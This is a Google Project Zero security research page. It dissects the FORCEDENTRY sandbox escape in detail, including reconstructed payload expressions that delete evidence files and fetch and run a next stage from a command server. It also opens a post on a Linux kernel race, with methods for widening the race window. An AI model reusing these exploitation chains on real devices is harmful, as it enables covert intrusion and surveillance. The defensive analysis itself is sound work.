Thursday, March 31, 2022

FORCEDENTRY: Sandbox Escape

Posted by Ian Beer & Samuel Groß of Google Project Zero

We want to thank Citizen Lab for sharing a sample of the FORCEDENTRY exploit with us, and Apple’s Security Engineering and Architecture (SEAR) group for collaborating with us on the technical analysis. Any editorial opinions reflected below are solely Project Zero’s and do not necessarily reflect those of the organizations we collaborated with during this research.

Late last year we published a writeup of the initial remote code execution stage of FORCEDENTRY, the zero-click iMessage exploit attributed by Citizen Lab to NSO. By sending a .gif iMessage attachment (which was really a PDF) NSO were able to remotely trigger a heap buffer overflow in the ImageIO JBIG2 decoder. They used that vulnerability to bootstrap a powerful weird machine capable of loading the next stage in the infection process: the sandbox escape.

In this post we'll take a look at that sandbox escape. It's notable for using only logic bugs. In fact it's unclear where the features that it uses end and the vulnerabilities which it abuses begin. Both current and upcoming state-of-the-art mitigations such as Pointer Authentication and Memory Tagging have no impact at all on this sandbox escape.

An observation

During our initial analysis of the .gif file Samuel noticed that rendering the image appeared to leak memory. Running the heap tool after releasing all the associated resources gave the following output:

$ heap $pid


All zones: 4631 nodes (826336 bytes)        


   COUNT    BYTES     AVG   CLASS_NAME   TYPE   BINARY          

   =====    =====     ===   ==========   ====   ======        

    1969   469120   238.3   non-object

     825    26400    32.0   JBIG2Bitmap  C++   CoreGraphics

heap was able to determine that the leaked memory contained JBIG2Bitmap objects.

Using the -address option we could find all the individual leaked bitmap objects:

$ heap -address JBIG2Bitmap $pid

and dump them out to files. One of those objects was quite unlike the others:

$ hexdump -C dumpXX.bin | head

00000000  62 70 6c 69 73 74 30 30  |bplist00|


00000018        24 76 65 72 73 69  |  $versi|

00000020  6f 6e 59 24 61 72 63 68  |onY$arch|

00000028  69 76 65 72 58 24 6f 62  |iverX$ob|

00000030  6a 65 63 74 73 54 24 74  |jectsT$t|

00000038  6f 70                    |op      |

00000040        4e 53 4b 65 79 65  |  NSKeye|

00000048  64 41 72 63 68 69 76 65  |dArchive|

It's clearly a serialized NSKeyedArchiver. Definitely not what you'd expect to see in a JBIG2Bitmap object. Running strings we see plenty of interesting things (noting that the URL below is redacted):

Objective-C class and selector names:










The name of the file which delivered the exploit:


Filesystem paths:



A URL:

Using plutil we can convert the bplist00 binary format to XML. Performing some post-processing and cleanup we can see that the top-level object in the NSKeyedArchiver is a serialized NSFunctionExpression object.
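Before handing a dumped object to plutil, it can be triaged by checking for the binary property list magic visible at offset 0 in the hexdump above. The following is a minimal sketch, assuming the dump has already been read into memory; `has_bplist_magic` is a hypothetical helper name and not part of any Apple tool.

```c
#include <stddef.h>
#include <string.h>

/* Returns 1 if buf starts with the 8-byte "bplist00" magic, else 0. */
static int has_bplist_magic(const unsigned char *buf, size_t len)
{
    static const char magic[] = "bplist00";
    const size_t magic_len = sizeof(magic) - 1; /* exclude the trailing NUL */

    if (buf == NULL || len < magic_len)
        return 0;
    return memcmp(buf, magic, magic_len) == 0;
}
```

A check like this only identifies the container format; whether the plist is a keyed archive still has to be established by looking for the $archiver and $objects keys.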

NSExpression NSPredicate NSExpression

If you've ever used Core Data or tried to filter an Objective-C collection you might have come across NSPredicates. According to Apple's public documentation they are used "to define logical conditions for constraining a search for a fetch or for in-memory filtering".

For example, in Objective-C you could filter an NSArray object like this:

  NSArray* names = @[@"one", @"two", @"three"];

  NSPredicate* pred;

  pred = [NSPredicate predicateWithFormat:

            @"SELF beginswith[c] 't'"];

  NSLog(@"%@", [names filteredArrayUsingPredicate:pred]);

The predicate is "SELF beginswith[c] 't'". This prints an NSArray containing only "two" and "three".
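To make the semantics of this predicate concrete, the same filter can be modeled outside Foundation. The sketch below is plain C rather than Objective-C, and `begins_with_ci` and `filter_begins_with_ci` are hypothetical helper names. It assumes ASCII input and the POSIX `strncasecmp` function, whereas the real `[c]` modifier performs Unicode-aware case-insensitive comparison.

```c
#include <stddef.h>
#include <string.h>
#include <strings.h> /* strncasecmp (POSIX) */

/* Model of "SELF beginswith[c] prefix": case-insensitive prefix match. */
static int begins_with_ci(const char *s, const char *prefix)
{
    return strncasecmp(s, prefix, strlen(prefix)) == 0;
}

/*
 * Copies pointers to the matching strings from in[0..n) into out,
 * preserving order, and returns the number of matches.
 * out must have room for n entries.
 */
static size_t filter_begins_with_ci(const char *const *in, size_t n,
                                    const char *prefix, const char **out)
{
    size_t kept = 0;
    for (size_t i = 0; i < n; i++) {
        if (begins_with_ci(in[i], prefix))
            out[kept++] = in[i];
    }
    return kept;
}
```

Applied to the three names from the Objective-C example with the prefix "t", this keeps "two" and "three" in that order.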

[NSPredicate predicateWithFormat] builds a predicate object by parsing a small query language, a little like an SQL query.

NSPredicates can be built up from NSExpressions, connected by NSComparisonPredicates (like less-than, greater-than and so on.)

NSExpressions themselves can be fairly complex, containing aggregate expressions (like "IN" and "CONTAINS"), subqueries, set expressions, and, most interestingly, function expressions.

Prior to 2007 (in OS X 10.4 and below) function expressions were limited to just the following five extra built-in methods: sum, count, min, max, and average.

But starting in OS X 10.5 (which would also be around the launch of iOS in 2007) NSFunctionExpressions were extended to allow arbitrary method invocations with the FUNCTION keyword:

  "FUNCTION('abc', 'stringByAppendingString:', 'def')" => @"abcdef"

FUNCTION takes a target object, a selector and an optional list of arguments then invokes the selector on the object, passing the arguments. In this case it will allocate an NSString object @"abc" then invoke the stringByAppendingString: selector passing the NSString @"def", which will evaluate to the NSString @"abcdef".
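The essential idea, invoking a method chosen by a string at evaluation time, can be illustrated without Foundation. The following toy model is plain C and is not how NSFunctionExpression is implemented. The contents of `selector_table` and the `function_invoke` helper are assumptions made up for illustration, and only string targets with at most one string argument are modeled.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* A "method": reads target and an optional arg, writes the result into out. */
typedef int (*method_fn)(const char *target, const char *arg,
                         char *out, size_t out_len);

static int append_string(const char *target, const char *arg,
                         char *out, size_t out_len)
{
    int n = snprintf(out, out_len, "%s%s", target, arg ? arg : "");
    return (n >= 0 && (size_t)n < out_len) ? 0 : -1; /* -1 on truncation */
}

static int uppercase_string(const char *target, const char *arg,
                            char *out, size_t out_len)
{
    (void)arg; /* unary selector: no argument */
    size_t len = strlen(target);
    if (len >= out_len)
        return -1;
    for (size_t i = 0; i < len; i++)
        out[i] = (char)toupper((unsigned char)target[i]);
    out[len] = '\0';
    return 0;
}

/* Selector names map to implementations; lookup happens at evaluation time. */
static const struct { const char *selector; method_fn fn; } selector_table[] = {
    { "stringByAppendingString:", append_string },
    { "uppercaseString",          uppercase_string },
};

/* Model of FUNCTION(target, selector, arg): 0 on success, -1 otherwise. */
static int function_invoke(const char *target, const char *selector,
                           const char *arg, char *out, size_t out_len)
{
    size_t count = sizeof(selector_table) / sizeof(selector_table[0]);
    for (size_t i = 0; i < count; i++) {
        if (strcmp(selector_table[i].selector, selector) == 0)
            return selector_table[i].fn(target, arg, out, out_len);
    }
    return -1; /* unknown selector */
}
```

In this model the reachable behavior is bounded by a two-entry table. In the Objective-C runtime the equivalent table is, in effect, every selector on every loaded class, which is what makes the real feature so powerful.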

In addition to the FUNCTION keyword there's CAST which allows full reflection-based access to all Objective-C types (as opposed to just being able to invoke selectors on literal strings and integers):

  "FUNCTION(CAST('NSFileManager', 'Class'), 'defaultManager')"

Here we can get access to the NSFileManager class and call the defaultManager selector to get a reference to a process's shared file manager instance.

These keywords exist in the string representation of NSPredicates and NSExpressions. Parsing those strings involves creating a graph of NSExpression objects, NSPredicate objects and their subclasses like NSFunctionExpression. It's a serialized version of such a graph which is present in the JBIG2 bitmap.

NSPredicates using the FUNCTION keyword are effectively Objective-C scripts. With some tricks it's possible to build nested function calls which can do almost anything you could do in procedural Objective-C. Figuring out some of those tricks was the key to the 2019 Real World CTF DezhouInstrumentz challenge, which would evaluate an attacker supplied NSExpression format string. The writeup by the challenge author is a great introduction to these ideas and I'd strongly recommend reading that now if you haven't. The rest of this post builds on the tricks described in that post.

A tale of two parts

The only job of the JBIG2 logic gate machine described in the previous blog post is to cause the deserialization and evaluation of an embedded NSFunctionExpression. No attempt is made to get native code execution, ROP, JOP or any similar technique.

Prior to iOS 14.5 the isa field of an Objective-C object was not protected by Pointer Authentication Codes (PAC), so the JBIG2 machine builds a fake Objective-C object with a fake isa such that the invocation of the dealloc selector causes the deserialization and evaluation of the NSFunctionExpression. This is very similar to the technique used by Samuel in the 2020 SLOP post.

This NSFunctionExpression has two purposes:

Firstly, it allocates and leaks an AMSKeepAlive object then tries to cover its tracks by finding and deleting the .gif file which delivered the exploit.

Secondly, it builds a payload NSPredicate object then triggers a logic bug to get that NSPredicate object evaluated in the CommCenter process, reachable from the IMTranscoderAgent sandbox via the NSXPC service.

Let's look at those two parts separately:

Covering tracks

The outer level NSFunctionExpression calls performSelectorOnMainThread:withObject:waitUntilDone: which in turn calls makeObjectsPerformSelector:@"expressionValueWithObject:context:" on an NSArray of four NSFunctionExpressions. This allows the four independent NSFunctionExpressions to be evaluated sequentially.

With some manual cleanup we can recover pseudo-Objective-C versions of the serialized NSFunctionExpressions.

The first one does this:

[[AMSKeepAlive alloc] initWithName:"KA"]

This allocates and then leaks an AppleMediaServices KeepAlive object. The exact purpose of this is unclear.

The second entry does this:

[[NSFileManager defaultManager] _web_removeFileOnlyAtPath:

  [@"/tmp/" stringByAppendingPathComponent:

    [ [ [ [

            [NSFileManager defaultManager]

            enumeratorAtPath: @"/tmp/"






            [NSPredicate predicateWithFormat:


                [@"SELF ENDSWITH '"

                  stringByAppendingString: "XXX.gif"]

                stringByAppendingString: "'"

      ]   ] ] ]





Reading these single expression NSFunctionExpressions is a little tricky; breaking that down into a more procedural form it's equivalent to this:

NSFileManager* fm = [NSFileManager defaultManager];

// Enumerate everything under /tmp/
NSDirectoryEnumerator* dir_enum;
dir_enum = [fm enumeratorAtPath: @"/tmp/"];
NSArray* allTmpFiles = [dir_enum allObjects];

// Build the predicate string: SELF ENDSWITH 'XXX.gif'
NSString* filter;
filter = [@"SELF ENDSWITH '" stringByAppendingString: @"XXX.gif"];
filter = [filter stringByAppendingString: @"'"];

NSPredicate* pred;
pred = [NSPredicate predicateWithFormat: filter];

// Keep only the paths which end with the exploit's filename
NSArray* matches;
matches = [allTmpFiles filteredArrayUsingPredicate: pred];
NSString* gif_subpath = [matches firstObject];

// Rebuild the absolute path and delete the file
NSString* root = @"/tmp/";
NSString* full_path;
full_path = [root stringByAppendingPathComponent: gif_subpath];
[fm _web_removeFileOnlyAtPath: full_path];

This finds the XXX.gif file used to deliver the exploit which iMessage has stored somewhere under the /tmp/ folder and deletes it.

The other two NSFunctionExpressions build a payload and then trigger its evaluation in CommCenter. For that we need to look at NSXPC.


NSXPC is a semi-transparent remote-procedure-call mechanism for Objective-C. It allows the instantiation of proxy objects in one process which transparently forward method calls to the "real" object in another process.

I say NSXPC is only semi-transparent because it does enforce some restrictions on what objects are allowed to traverse process boundaries. Any object "exported" via NSXPC must also define a protocol which designates which methods can be invoked and the allowable types for each argument. The NSXPC programming guide further explains the extra handling required for methods which require collections and other edge cases.

The low-level serialization used by NSXPC is the same explored by Natalie Silvanovich in her 2019 blog post looking at the fully-remote attack surface of the iPhone. An important observation in that post was that subclasses of classes with any level of inheritance are also allowed, as is always the case with NSKeyedUnarchiver deserialization.

This means that any protocol object which declares a particular type for a field will also, by design, accept any subclass of that type.

The logical extreme of this would be that a protocol which declared an argument type of NSObject would allow any subclass, which is the vast majority of all Objective-C classes.

Grep to the rescue

This is fairly easy to analyze automatically. Protocols are defined statically so we can just find them and check each one. Tools like RuntimeBrowser and class-dump can parse the static protocol definitions and output human-readable source code. Grepping the output of RuntimeBrowser like this is sufficient to find dozens of cases of NSObject pointers in Objective-C protocols:

  $ egrep -Rn "\(NSObject \*\)arg" *

Not all the results are necessarily exposed via NSXPC, but some clearly are, including the following two matches in CoreTelephony.framework:




        (CTXPCServiceSubscriptionContext *)arg1

       identity:(NSObject *)arg2

       completion:(void (^)(NSError *))arg3;




         (CTXPCServiceSubscriptionContext *)arg1

       key:(NSString *)arg2

       value:(NSObject *)arg3

       completion:(void (^)(NSError *))arg4;

The evaluateMobileSubscriberIdentity string appears in the list of selector-like strings we first saw when running strings on the bplist00. Indeed, looking at the parsed and beautified NSFunctionExpression we see it doing this:

[ [ [CoreTelephonyClient alloc] init]



This is a wrapper around the lower-level NSXPC code and the argument passed as Y above to the CoreTelephonyClient method corresponds to the identity:(NSObject *)arg2 argument passed via NSXPC to CommCenter (which is the process that hosts the NSXPC service underlying the CoreTelephonyClient). Since the parameter is explicitly typed as NSObject* we can in fact pass any subclass of NSObject, including an NSPredicate! Game over?

Parsing vs Evaluation

It's not quite that easy. The DezhouInstrumentz writeup discusses this attack surface and notes that there's an extra, specific mitigation. When an NSPredicate is deserialized by its initWithCoder: implementation it sets a flag which disables evaluation of the predicate until the allowEvaluation method is called.

So whilst you certainly can pass an NSPredicate* as the identity argument across NSXPC and get it deserialized in CommCenter, the implementation of evaluateMobileSubscriberIdentity: in CommCenter is definitely not going to call allowEvaluation to mark the predicate as safe for evaluation and then call evaluateWithObject: to evaluate it.

Old techniques, new tricks

From the exploit we can see that they in fact pass an NSArray with two elements:

[0] = AVSpeechSynthesisVoice

[1] = PTSection {rows = NSArray { [0] = PTRow() } }

The first element is an AVSpeechSynthesisVoice object and the second is a PTSection containing a single PTRow. Why?

PTSection and PTRow are both defined in the PrototypeTools private framework. PrototypeTools isn't loaded in the CommCenter target process. Let's look at what happens when an AVSpeechSynthesisVoice is deserialized:

Finding a voice

AVSpeechSynthesisVoice is implemented in AVFAudio.framework, which is loaded in CommCenter:

$ sudo vmmap `pgrep CommCenter` | grep AVFAudio

__TEXT  7ffa22c4c000-7ffa22d44000 r-x/r-x SM=COW \


Assuming that this was the first time that an AVSpeechSynthesisVoice object was created inside CommCenter (which is quite likely) the Objective-C runtime will call the initialize method on the AVSpeechSynthesisVoice class before instantiating the first instance.

[AVSpeechSynthesisVoice initialize] has a dispatch_once block with the following code:

NSBundle* bundle;

bundle = [NSBundle bundleWithPath:



if (![bundle isLoaded]) {
    NSError* err = nil;
    [bundle loadAndReturnError:&err];
}


So sending a serialized AVSpeechSynthesisVoice object will cause CommCenter to load the /System/Library/AccessibilityBundles/AXSpeechImplementation.bundle library. With some scripting using otool -L to list dependencies we can find the following dependency chain from AXSpeechImplementation.bundle to PrototypeTools.framework:












This explains how the deserialization of a PTSection will succeed. But what's so special about PTSections and PTRows?

Predicated Sections

[PTRow initWithCoder:] contains the following snippet:

  self->condition = [coder decodeObjectOfClass:NSPredicate


  [self->condition allowEvaluation]

This will deserialize an NSPredicate object, assign it to the PTRow member variable condition and call allowEvaluation. This is meant to indicate that the deserializing code considers this predicate safe, but there's no attempt to perform any validation on the predicate contents here. They then need one more trick: a code path which will additionally evaluate the PTRow's condition predicate.

Here's a snippet from [PTSection initWithCoder:]:

NSSet* allowed = [NSSet setWithObjects: @[PTRow]]

id* rows = [coder decodeObjectOfClasses:allowed forKey:@"rows"]

[self initWithRows:rows]

This deserializes an array of PTRows and passes them to [PTSection initWithRows:] which assigns a copy of the array of PTRows to PTSection->rows then calls [self _reloadEnabledRows] which in turn passes each row to [self _shouldEnableRow:]:

_shouldEnableRow:row {
  if (row->condition) {
    return [row->condition evaluateWithObject: self->settings];
  }
}

And thus, by sending a PTSection containing a single PTRow with an attached condition NSPredicate they can cause the evaluation of an arbitrary NSPredicate, effectively equivalent to arbitrary code execution in the context of CommCenter.
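The interaction between the deserialization mitigation and the PTRow/PTSection behavior can be summarized in a small model. This is a sketch in plain C under stated assumptions: every struct and function name here (`predicate_model`, `row_decode`, `section_init_with_row`, `counting_body` and so on) is a hypothetical stand-in and does not correspond to a real Foundation or PrototypeTools symbol.

```c
#include <stdbool.h>
#include <stddef.h>

struct predicate_model {
    bool evaluation_allowed;    /* cleared on decode, set by allow_evaluation */
    int (*body)(void *context); /* sender-controlled behavior in this analogy */
};

/* Model of NSPredicate decoding: a decoded predicate starts out disabled. */
static void predicate_decode(struct predicate_model *p, int (*body)(void *))
{
    p->evaluation_allowed = false;
    p->body = body;
}

static void predicate_allow_evaluation(struct predicate_model *p)
{
    p->evaluation_allowed = true;
}

/* Returns -1 (refused) unless evaluation was explicitly allowed. */
static int predicate_evaluate(struct predicate_model *p, void *context)
{
    if (!p->evaluation_allowed)
        return -1;
    return p->body(context);
}

struct row_model { struct predicate_model condition; };

/* Model of the row decoder: decodes the condition and blesses it unchecked. */
static void row_decode(struct row_model *row, int (*body)(void *))
{
    predicate_decode(&row->condition, body);
    predicate_allow_evaluation(&row->condition); /* no validation of contents */
}

/* Model of the section initializer: evaluates the row's condition on init. */
static int section_init_with_row(struct row_model *row, void *settings)
{
    return predicate_evaluate(&row->condition, settings);
}

/* Stand-in payload: counts how many times it was evaluated. */
static int counting_body(void *context)
{
    int *calls = context;
    (*calls)++;
    return 1;
}
```

A predicate decoded on its own refuses to run, while the same predicate wrapped in a row and a section runs as a side effect of deserialization, because the wrapper both allows and triggers evaluation.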

Payload 2

The NSPredicate attached to the PTRow uses a similar trick to the first payload to cause the evaluation of six independent NSFunctionExpressions, but this time in the context of the CommCenter process. They're presented here in pseudo Objective-C:

Expression 1

[  [CaliCalendarAnonymizer sharedAnonymizedStrings]




         @""], '0']

   forKey: @"0"


The use of [CaliCalendarAnonymizer sharedAnonymizedStrings] is a trick to enable the array of independent NSFunctionExpressions to have "local variables". In this first case they create an NSURLComponents object which is used to build parameterised URLs. This URL builder is then stored in the global dictionary returned by [CaliCalendarAnonymizer sharedAnonymizedStrings] under the key "0".

Expression 2




 ] load]

This causes the OpusFoundation library to be loaded. The exact reason for this is unclear, though the dependency graph of OpusFoundation does include AuthKit which is used by the next NSFunctionExpression. It's possible that this payload is generic and might also be expected to work when evaluated in processes where AuthKit isn't loaded.

Expression 3

[ [ [CaliCalendarAnonymizer sharedAnonymizedStrings]

    objectForKey:@"0" ]


    [ [ [NSArray arrayWithObject:


                    queryItemWithName: @"m"

                    value:[AKDevice _hardwareModel] ]

                                 ] arrayByAddingObject:


                    queryItemWithName: @"v"

                    value:[AKDevice _buildNumber] ]

                                 ] arrayByAddingObject:


                    queryItemWithName: @"u"

                    value:[NSString randomString]]


This grabs a reference to the NSURLComponents object stored under the "0" key in the global sharedAnonymizedStrings dictionary then parameterizes the HTTP query string with three values:

  [AKDevice _hardwareModel] returns a string like "iPhone12,3" which determines the exact device model.

  [AKDevice _buildNumber] returns a string like "18A8395" which in combination with the device model allows determining the exact firmware image running on the device.

  [NSString randomString] returns a decimal string representation of a 32-bit random integer like "394681493".
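The shape of the resulting query string can be sketched as follows. This is an illustration in plain C using `snprintf`, not the NSURLComponents/NSURLQueryItem path the payload actually takes; `build_query` is a hypothetical helper, the base URL is omitted because it is redacted in this post, and no percent-encoding is performed.

```c
#include <inttypes.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/*
 * Formats "m=<model>&v=<build>&u=<nonce>" into out.
 * Returns 0 on success, -1 if the result would not fit.
 */
static int build_query(char *out, size_t out_len, const char *hardware_model,
                       const char *build_number, uint32_t nonce)
{
    int n = snprintf(out, out_len, "m=%s&v=%s&u=%" PRIu32,
                     hardware_model, build_number, nonce);
    return (n >= 0 && (size_t)n < out_len) ? 0 : -1;
}
```

With the example values quoted above, the query would read m=iPhone12,3&v=18A8395&u=394681493, which is enough for a server to select a response for one specific device model and build.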

Expression 4

[ [CaliCalendarAnonymizer sharedAnonymizedStrings]






               [[[CaliCalendarAnonymizer sharedAnonymizedStrings]

                 objectForKey:@"0"] URL]

          ] AES128DecryptWithPassword:NSData(XXXX)

         ]  decompressedDataUsingAlgorithm:3 error:]

       options: Class(NSConstantValueExpression)

      format: Class(NSConstantValueExpression)





The innermost reference to sharedAnonymizedStrings here grabs the NSURLComponents object and builds the full URL from the query string parameters set in the previous expression. That URL is passed to [NSData dataWithContentsOfURL:] to fetch a data blob from a remote server.

That data blob is decrypted with a hardcoded AES128 key, decompressed using zlib then parsed as a plist. That parsed plist is stored in the sharedAnonymizedStrings dictionary under the key "1".

Expression 5

[ [[NSThread mainThread] threadDictionary]


    [[CaliCalendarAnonymizer sharedAnonymizedStrings]



This copies all the keys and values from the "next-stage" plist into the main thread's threadDictionary.

Expression 6

[ [NSExpression expressionWithFormat:

    [[[CaliCalendarAnonymizer sharedAnonymizedStrings]


    objectForKey: @"a"]


  expressionValueWithObject:nil context:nil


Finally, this fetches the value of the "a" key from the next-stage plist, parses it as an NSExpression string and evaluates it.

End of the line

At this point we lose the ability to follow the exploit. The attackers have escaped the IMTranscoderAgent sandbox, requested a next-stage from the command and control server and executed it, all without any memory corruption or dependencies on particular versions of the operating system.

In response to this exploit iOS 15.1 significantly reduced the computational power available to NSExpressions:

NSExpression immediately forbids certain operations that have significant side effects, like creating and destroying objects. Additionally, casting string class names into Class objects with NSConstantValueExpression is deprecated.

In addition the PTSection and PTRow objects have been hardened with the following check added around the parsing of serialized NSPredicates:

if (os_variant_allows_internal_security_policies(
      "")) {
  [coder decodeObjectOfClass:NSPredicate forKey:@"condition"];
}


Object deserialization across trust boundaries still presents an enormous attack surface however.


Perhaps the most striking takeaway is the depth of the attack surface reachable from what would hopefully be a fairly constrained sandbox. With just two tricks (NSObject pointers in protocols and library loading gadgets) it's likely possible to attack almost every initWithCoder implementation in the dyld_shared_cache. There are presumably many other classes in addition to NSPredicate and NSExpression which provide the building blocks for logic-style exploits.

The expressive power of NSXPC just seems fundamentally ill-suited for use across sandbox boundaries, even though it was designed with exactly that in mind. The attack surface reachable from inside a sandbox should be minimal, enumerable and reviewable. Ideally only code which is required for correct functionality should be reachable; it should be possible to determine exactly what that exposed code is and the amount of exposed code should be small enough that manually reviewing it is tractable.

NSXPC requiring developers to explicitly add remotely-exposed methods to interface protocols is a great example of how to make the attack surface enumerable - you can at least find all the entry points fairly easily. However the support for inheritance means that the attack surface exposed there likely isn't reviewable; it's simply too large for anything beyond a basic example.

Refactoring these critical IPC boundaries to be more prescriptive - only allowing a much narrower set of objects in this case - would be a good step towards making the attack surface reviewable. This would probably require fairly significant refactoring for NSXPC; it's built around natively supporting the Objective-C inheritance model and is used very broadly. But without such changes the exposed attack surface is just too large to audit effectively.

The advent of Memory Tagging Extensions (MTE), likely shipping in multiple consumer devices across the ARM ecosystem this year, is a big step in the defense against memory corruption exploitation. But attackers innovate too, and are likely already two steps ahead with a renewed focus on logic bugs. This sandbox escape exploit is likely a sign of the shift we can expect to see over the next few years if the promises of MTE can be delivered. And this exploit was far more extensible, reliable and generic than almost any memory corruption exploit could ever hope to be.

Thursday, March 24, 2022

Racing against the clock -- hitting a tiny kernel race window


How to make a tiny kernel race window really large even on kernels without CONFIG_PREEMPT:

  • use a cache miss to widen the race window a little bit
  • make a timerfd expire in that window (which will run in an interrupt handler - in other words, in hardirq context)
  • make sure that the wakeup triggered by the timerfd has to churn through 50000 waitqueue items created by epoll

Racing one thread against a timer also avoids accumulating timing variations from two threads in each race attempt - hence the title. On the other hand, it also means you now have to deal with how hardware timers actually work, which introduces its own flavors of weird timing variations.


I recently discovered a race condition in the Linux kernel. (While trying to explain to someone how the fix for CVE-2021-0920 worked - I was explaining why the Unix GC is now safe, and then got confused because I couldn't actually figure out why it's safe after that fix, eventually realizing that it actually isn't safe.) It's a fairly narrow race window, so I was wondering whether it could be hit with a small number of attempts - especially on kernels that aren't built with CONFIG_PREEMPT, which would make it possible to preempt a thread with another thread, as I described at LSSEU2019.

This is a writeup of how I managed to hit the race on a normal Linux desktop kernel, with a hit rate somewhere around 30% if the proof of concept has been tuned for the specific machine. I didn't do a full exploit though, I stopped at getting evidence of use-after-free (UAF) accesses (with the help of a very large file descriptor table and userfaultfd, which might not be available to normal users depending on system configuration) because that's the part I was curious about.

This also demonstrates that even very small race conditions can still be exploitable if someone sinks enough time into writing an exploit, so be careful if you dismiss very small race windows as unexploitable or don't treat such issues as security bugs.

The UAF reproducer is in our bugtracker.

The bug

In the UNIX domain socket garbage collection code (which is needed to deal with reference loops formed by UNIX domain sockets that use SCM_RIGHTS file descriptor passing), the kernel tries to figure out whether it can account for all references to some file by comparing the file's refcount with the number of references from inflight SKBs (socket buffers). If they are equal, it assumes that the UNIX domain sockets subsystem effectively has exclusive access to the file because it owns all references.

(The same pattern also appears for files as an optimization in __fdget_pos(), see this LKML thread.)

The problem is that struct file can also be referenced from an RCU read-side critical section (which you can't detect by looking at the refcount), and such an RCU reference can be upgraded into a refcounted reference using get_file_rcu() / get_file_rcu_many() by __fget_files() as long as the refcount is non-zero. For example, when this happens in the dup() syscall, the resulting reference will then be installed in the FD table and be available for subsequent syscalls.

When the garbage collector (GC) believes that it has exclusive access to a file, it will perform operations on that file that violate the locking rules used in normal socket-related syscalls such as recvmsg() - unix_stream_read_generic() assumes that queued SKBs can only be removed under the ->iolock mutex, but the GC removes queued SKBs without using that mutex. (Thanks to Xingyu Jin for explaining that to me.)

One way of looking at this bug is that the GC is working correctly - here's a state diagram showing some of the possible states of a struct file, with more specific states nested under less specific ones and with the state transition in the GC marked:

All relevant states are RCU-accessible. An RCU-accessible object can have either a zero refcount or a positive refcount. Objects with a positive refcount can be either live or owned by the garbage collector. When the GC attempts to grab a file, it transitions from the state "live" to the state "owned by GC" by getting exclusive ownership of all references to the file.

Seen that way, it is __fget_files() that makes an incorrect assumption about the state of the struct file while it is trying to narrow down its possible states: it checks whether get_file_rcu() / get_file_rcu_many() succeeds, which narrows the file's state down a bit but not far enough:

__fget_files() first uses get_file_rcu() to conditionally narrow the state of a file from "any RCU-accessible state" to "any refcounted state". Then it has to narrow the state from "any refcounted state" to "live", but instead it just assumes that they are equivalent.

And this directly leads to how the bug was fixed (there's another follow-up patch, but that one just tries to clarify the code and recoup some of the resulting performance loss) - the fix adds another check in __fget_files() to properly narrow down the state of the file such that the file is guaranteed to be live:

The fix is to properly narrow the state from "any refcounted state" to "live" by checking whether the file is still referenced by a file descriptor table entry.

The fix ensures that a live reference can only be derived from another live reference by comparing with an FD table entry, which is guaranteed to point to a live object.
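The "grab pointer, increment refcount, recheck pointer" idea can be modeled in userspace with C11 atomics. This is a single-threaded sketch under stated assumptions, not kernel code: `file_model`, `fd_slot`, `fget_model` and the `window_hook` mechanism are hypothetical names, and the hook exists only so that a close() can be simulated deterministically inside the race window. Like the kernel loop, `fget_model` retries while the slot still points at an object whose count is zero, so it relies on the slot eventually being cleared.

```c
#include <stdatomic.h>
#include <stdbool.h>
#include <stddef.h>

struct file_model {
    atomic_long f_count; /* refcount; zero means the object is being freed */
};

typedef _Atomic(struct file_model *) fd_slot; /* one FD table entry */

/* Model of get_file_rcu_many(): add refs unless the count is already zero. */
static bool get_ref_unless_zero(struct file_model *f, long refs)
{
    long old = atomic_load(&f->f_count);
    while (old != 0) {
        /* On failure, old is updated to the current value and we retry. */
        if (atomic_compare_exchange_weak(&f->f_count, &old, old + refs))
            return true;
    }
    return false;
}

static void put_ref(struct file_model *f, long refs)
{
    atomic_fetch_sub(&f->f_count, refs);
}

/* Hook that lets a caller run code inside the race window (fires once). */
typedef void (*window_hook)(void *ctx);

static struct file_model *fget_model(fd_slot *slot, long refs, bool recheck,
                                     window_hook hook, void *ctx)
{
    for (;;) {
        struct file_model *f = atomic_load(slot); /* race window start */
        if (f == NULL)
            return NULL;
        if (hook != NULL) {
            hook(ctx);
            hook = NULL;
        }
        if (!get_ref_unless_zero(f, refs))        /* race window end */
            continue;
        if (!recheck || atomic_load(slot) == f)
            return f;                             /* reference is live */
        put_ref(f, refs); /* slot changed under us: drop the ref and retry */
    }
}

/* Example hook: models close(fd) landing in the window. */
struct close_ctx { fd_slot *slot; struct file_model *file; };

static void close_in_window(void *ctx)
{
    struct close_ctx *c = ctx;
    atomic_store(c->slot, (struct file_model *)NULL); /* table entry cleared */
    put_ref(c->file, 1);                              /* FD's reference dropped */
}
```

Starting from a count of two (one reference from the FD table, one from an inflight SKB), running `close_in_window` in the window leaves only the inflight reference. Without the recheck, `fget_model` still hands out a new reference to an object the GC may now consider exclusively its own; with the recheck it notices the cleared slot, drops the reference and returns NULL.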

[Sidenote: This scheme is similar to the one used for struct page - gup_pte_range() also uses the "grab pointer, increment refcount, recheck pointer" pattern for locklessly looking up a struct page from a page table entry while ensuring that new refcounted references can't be created without holding an existing reference. This is really important for struct page because a page can be given back to the page allocator and reused while gup_pte_range() holds an uncounted reference to it - freed pages still have their struct page, so there's no need to delay freeing of the page - so if this went wrong, you'd get a page UAF.]

My initial suggestion was to instead fix the issue by changing how unix_gc() ensures that it has exclusive access, letting it set the file's refcount to zero to prevent turning RCU references into refcounted ones; this would have avoided adding any code in the hot __fget_files() path, but it would have only fixed unix_gc(), not the __fdget_pos() case I discovered later, so it's probably a good thing this isn't how it was fixed.

[Sidenote: In my original bug report I wrote that you'd have to wait an RCU grace period in the GC for this, but that wouldn't be necessary as long as the GC ensures that a reaped socket's refcount never becomes non-zero again.]

The race

There are multiple race conditions involved in exploiting this bug, but by far the trickiest to hit is that we have to race an operation into the tiny race window in the middle of __fget_files() (which can e.g. be reached via dup()), between the file descriptor table lookup and the refcount increment:

static struct file *__fget_files(struct files_struct *files, unsigned int fd,
                                 fmode_t mask, unsigned int refs)
{
        struct file *file;

        rcu_read_lock();
loop:
        file = files_lookup_fd_rcu(files, fd); // race window start
        if (file) {
                /* File object ref couldn't be taken.
                 * dup2() atomicity guarantee is the reason
                 * we loop to catch the new file (or NULL pointer)
                 */
                if (file->f_mode & mask)
                        file = NULL;
                else if (!get_file_rcu_many(file, refs)) // race window end
                        goto loop;
        }
        rcu_read_unlock();

        return file;
}


In this race window, the file descriptor must be closed (to drop the FD's reference to the file) and a unix_gc() run must get past the point where it checks the file's refcount ("total_refs = file_count(u->sk.sk_socket->file)").

